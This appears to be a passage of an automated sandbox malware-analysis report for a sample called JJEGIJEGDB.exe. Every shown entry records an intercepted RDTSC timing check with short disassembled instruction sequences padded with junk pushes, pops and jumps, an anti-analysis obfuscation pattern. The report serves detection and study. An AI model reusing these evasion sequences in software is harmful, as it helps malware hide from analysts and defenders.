Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7B579 second address: C7B57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7B57D second address: C7B58F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7B58F second address: C7B5BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F34D8F44CC3h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7B5BE second address: C7B5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7BABB second address: C7BABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7C112 second address: C7C118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7C118 second address: C7C11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7C11E second address: C7C122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7C122 second address: C7C126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7C126 second address: C7C12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7F28F second address: C7F29E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F34D8F44CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7F29E second address: C7F2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 ja 00007F34D94219DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7F2B5 second address: C7F2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7F538 second address: C7F53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7F53C second address: C7F55A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F34D8F44CC4h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7F55A second address: C7F55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8D5B8 second address: C8D5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8D6F7 second address: C8D724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F34D94219DBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F34D94219E9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8D724 second address: C8D73A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnc 00007F34D8F44CB6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8D73A second address: C8D73F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8D73F second address: C8D762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F34D8F44CB6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8D8BD second address: C8D8C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8E1D8 second address: C8E1E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8E1E2 second address: C8E1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8E1E8 second address: C8E20C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F34D8F44CB6h 0x00000008 jmp 00007F34D8F44CC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8E20C second address: C8E210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8C88B second address: C8C892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA069E second address: CA06B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219DFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA06B1 second address: CA06BB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D8F44CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA06BB second address: CA06CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F34D94219DEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA06CB second address: CA06D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA023B second address: CA023F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA023F second address: CA0245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA0245 second address: CA0251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA0251 second address: CA0257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA0257 second address: CA025C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA376B second address: CA3771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA6188 second address: CA6192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA6192 second address: CA61A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA5D09 second address: CA5D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CB3D5E second address: CB3D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F34D8F44CB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CB3D6A second address: CB3D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CB3D6F second address: CB3D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CB3D75 second address: CB3D93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F34D94219DDh 0x0000000e jnl 00007F34D94219D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC1089 second address: CC108D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC108D second address: CC1091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC1091 second address: CC10A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F34D8F44CBEh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC11F2 second address: CC1201 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F34D94219D6h 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC1393 second address: CC13C8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F34D8F44CB6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F34D8F44CC3h 0x00000013 jmp 00007F34D8F44CC4h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC17BE second address: CC17D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC17D9 second address: CC17EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F34D8F44CBCh 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC1933 second address: CC1954 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F34D94219DAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F34D94219DEh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC1954 second address: CC196A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F34D8F44CBBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC534A second address: CC535B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC535B second address: CC5363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC4EA0 second address: CC4EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC4EA4 second address: CC4EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC4EA8 second address: CC4EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F34D94219DEh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC4EBE second address: CC4EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC503C second address: CC5070 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jnl 00007F34D94219F3h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC8CB5 second address: CC8CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CD2A94 second address: CD2A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CD2A9A second address: CD2AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CE818F second address: CE8194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CE7EFF second address: CE7F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CFF8F9 second address: CFF8FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CFF8FD second address: CFF91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CFF91D second address: CFF93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007F34D94219F5h 0x0000000b jmp 00007F34D94219E1h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CFF93C second address: CFF942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CFFBB4 second address: CFFBB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CFFE70 second address: CFFE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D0029E second address: D002DB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F34D94219F0h 0x00000008 jmp 00007F34D94219DFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F34D94219D8h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D00579 second address: D00590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnp 00007F34D8F44CC2h 0x0000000b jl 00007F34D8F44CB6h 0x00000011 jc 00007F34D8F44CB6h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D03388 second address: D0338C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D038C4 second address: D038C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D038C9 second address: D038D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F34D94219D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D038D4 second address: D038E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F34D8F44CB8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D038E6 second address: D038EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D038EB second address: D03946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F34D8F44CB6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov dword ptr [ebp+122DB3ECh], edx 0x00000014 push dword ptr [ebp+122D1FD0h] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F34D8F44CB8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jl 00007F34D8F44CBCh 0x0000003a mov edx, dword ptr [ebp+122D3319h] 0x00000040 and edx, dword ptr [ebp+122D33D1h] 0x00000046 push C5BAC5A1h 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F34D8F44CBAh 0x00000052 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D06321 second address: D0632C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F34D94219D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D0632C second address: D06339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007F34D8F44CC2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A000B second address: 53A0011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0011 second address: 53A0015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0015 second address: 53A0019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0019 second address: 53A00DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F34D8F44CC8h 0x0000000e push eax 0x0000000f jmp 00007F34D8F44CBBh 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov cx, C8CBh 0x0000001a pushfd 0x0000001b jmp 00007F34D8F44CC0h 0x00000020 sub al, FFFFFFD8h 0x00000023 jmp 00007F34D8F44CBBh 0x00000028 popfd 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F34D8F44CC4h 0x00000033 sub esi, 3628B638h 0x00000039 jmp 00007F34D8F44CBBh 0x0000003e popfd 0x0000003f call 00007F34D8F44CC8h 0x00000044 mov ecx, 2288B0F1h 0x00000049 pop ecx 0x0000004a popad 0x0000004b pop ebp 0x0000004c pushad 0x0000004d push edi 0x0000004e mov dl, cl 0x00000050 pop edi 0x00000051 push eax 0x00000052 push edx 0x00000053 pushfd 0x00000054 jmp 00007F34D8F44CBEh 0x00000059 add ecx, 521B5AF8h 0x0000005f jmp 00007F34D8F44CBBh 0x00000064 popfd 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390097 second address: 53900DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F34D94219E6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F34D94219E7h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53900DC second address: 539011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F34D8F44CBBh 0x0000000b sub ch, FFFFFFBEh 0x0000000e jmp 00007F34D8F44CC9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F34D8F44CBDh 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0E69 second address: 53C0E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0E6D second address: 53C0E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
